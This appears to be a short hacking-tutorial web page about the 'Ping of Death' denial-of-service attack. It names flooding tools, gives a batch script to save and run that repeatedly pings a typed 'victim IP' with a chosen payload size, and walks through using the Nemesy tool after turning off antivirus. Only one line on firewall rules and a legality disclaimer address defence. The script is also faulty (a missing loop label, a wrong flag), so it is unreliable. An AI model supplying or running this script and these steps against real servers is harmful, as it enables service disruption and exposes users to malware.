Ping of Death DDoS Attack with video

Ping of Death : DDoS Attack

Ping of Death is a one kind of DDoS Attack. By ping of death hacker send malicious data load to victim server.

Why Network Admin should learn about DDoS attack?

Security patches for operating systems, router configuration, firewalls and intrusion detection systems can be used to protect against denial of service attacks.

Tools for Ping of Death Attack

1. Nemesy

2. Land and LaTierra

3. Blast

4. Panther

5. Botnets

also you can developed own. Copy this script and save it with KarimZI.bat


@echo off

color A

Title KarimZI - Ping of Death Attack

Set /p IP=Type Victim IPv4 :

Set /p Puffer=SendPuffer/Dataload :


Set /a Send=%Send%+1

ping %IP% -1 %Puffer% -w 15 -n 1 >NULL

echo ATTACK by KarimZI :%IP% :%Puffer% :%Send%

goto Ping

1. Run this KarimZi.bat file

2. Type victim IP

3. Type Data-load limit

4. Hit Enter


Attack by Nemesy

Before download Nemesy. Turn off your anti virus.

1. Type Victim IP

2. Packet Number = 0 (0 means infinity)

3. Size = 65500 (Size mean data load, How many byte you want to send)

4. Delay = 100 (Delay mean interval in Millisecond)

5. Click Send

Prevent from DDoS Attack

Create Firewall rules for limited access in limited time.

DDoS attacked are illegal, don't try with another network which is not authorized to do.
